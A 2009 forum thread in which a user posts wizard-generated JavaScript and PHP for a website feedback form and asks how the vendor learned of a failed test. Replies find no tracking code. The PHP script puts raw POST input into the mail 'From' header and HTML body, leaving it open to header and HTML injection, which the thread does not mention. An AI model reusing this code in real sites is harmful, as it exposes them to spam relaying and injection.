View unanswered posts | View active topics It is currently Wed Oct 22, 2014 6:32 pm



Reply to topic  [ 4 posts ] 
 Feedback Form: Security Issue 
Author Message
Junior Member

Joined: Thu Nov 19, 2009 10:51 pm
Posts: 2
Post Feedback Form: Security Issue
I spent a good deal of time yesterday searching online for a suitable feedback form for a site I am creating for my sister-in-law. I finally found one that seemed to suit my needs at:
http://www.sigmanetz.com/web-form-wizard.html

Everything here seemed above board and it took very little time to generate the necessary code in the site’s wizard.
I followed the accompanying instructions to create feedback.php as well as adding the HTML form code into a web page named feedback.html. I pasted the following Javascript into the head of this page as directed:

<script type="text/javascript">
function isValidEmail(e) {
var p = /^[^@]+@[^@]+.[a-z]{2,}$/i;
if(e.search(p)==-1){
return false;
}
}

function val()
{
valid = true;
if(document.form.name.value == "")
{
alert("Please enter your name.");
document.form.name.focus();
return false;
}
if(document.form.email.value == "")
{
alert("Please enter an E-mail Address. ");
document.form.email.focus();
return false;
}
if(isValidEmail(document.form.email.value) == false)
{
alert("Please enter a valid E-mail Address.");
document.form.email.focus();
return false;
}

if(document.form.comments.value == "")
{
alert("Please enter your comments.");
document.form.comments.focus();
return false;
}

return true;
}

</script>

I also created a page named okay.html as directed and then uploaded both web pages and the feedback.php script to tradescards.org to test them out online.
This is the code the wizard generated for me for feedback.php:
<?php
$from=trim($_POST['email']);
$to="eamonn.henry@topmail.ie";
$subject = "Feedback Form Comments";

$eol="\r\n";
// Common Headers
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'From: '.$from."\r\n";

$name=trim($_POST['name']);
$email=trim($_POST['email']);
$comments=trim($_POST['comments']);
$body="

<strong>Name: </strong>$name

<strong>E-mail: </strong>$email

<strong>Comments: </strong>$comments


";
if(mail($to, $subject, $body, $headers)){

echo "<script>alert('Your comments have been recieved. Thank you.');location.href='http://www.tradescards.org/okay.html';</script>";
}
else{
echo "<script>alert('ERROR: Failed to receive comments, please try again.');location.href='http://www.tradescards.org/feedback.html';</script>";
}

?>

I was in a bit of a hurry and, when checking through the generated code, I somehow changed the URL of the feedback form at the end of this script from feedback.html to feedback.php.
Obviously, when I tried the feedback form online it did not work so I gave up in frustration- this was one more in a line of flops.
However, I got quite a surprise when I went to the email account I had chosen for feedback replies.
I found quite a courteous message awaiting me from one of the folks at sigmanetz.com addressed to the owner of the site, my sister-in-law, (Phil Henry) that :

“It has come to our attention that you have recently attempted to create
a feedback form with Sigmanetz Tutorials. We would just like to inform
you, that, from the information we have received, that you did not
successfully create the feedback form. This is because you have entered
http://www.tradescards.org/feedback._*php*_ as the URL for the feedback
form, instead of using [url]http://www.tradescards.org/feedback._*html*_”[/url]


The email went on to suggest that a return to the wizard to regenerate a corrected script would be a good idea and offered any additional help that might be needed.

From the time stamp on the email, I would estimate that it was sent less than 30 minutes after I had made the failed attempt to test the form. So in order to check out other pages on the site to find the owner’s name and to compose the email, Sigmanetz must have been alerted as soon as I hit the “submit” button.

I am very concerned about this.
I see nothing in the generated code to indicate that they were tracking my activities so how were they aware that I had used their code at all? If I had managed at the first attempt to get the form to work and then went on to publish the site with their form and related pages would there possibly be a danger of confidential information being monitored?
I realise that this post is quite lengthy and I apologise for this but I thought it best to publish the relevant code sections in the hope that somebody here might be able to explain what is happening here.


Fri Nov 20, 2009 12:22 am
Report this post
Profile
Junior Member

Joined: Thu Nov 19, 2009 10:51 pm
Posts: 2
Post 
Xnuiem wrote:
Nothing in there that looks like it sent anything. More than likely it happened when you used the wizard on their site.

Thanks for your help, Xnuiem. I had been so surprised when I found my form was being tracked that I completely overlooked the obvious.


Sun Nov 22, 2009 5:56 am
Report this post
Profile
Junior Member

Joined: Fri Nov 27, 2009 8:56 am
Posts: 1
Post Mostly Harmless...
There is absolutely nothing in the code that indicates that any sort of tracking is taking place. What they probably did, is simply kept a copy of your E-mail and URL, once you pressed the submit button, to see who was using their service. What it seems happened, was that they were genuinely trying to help you. Other than that, it all seems mostly harmless ;-)


Fri Nov 27, 2009 9:02 am
Report this post
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 4 posts ] 

Who is online

Users browsing this forum: No registered users and 4 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
© Copyright 2003-2008 www.php-editors.com. The ultimate PHP Editor and PHP IDE site.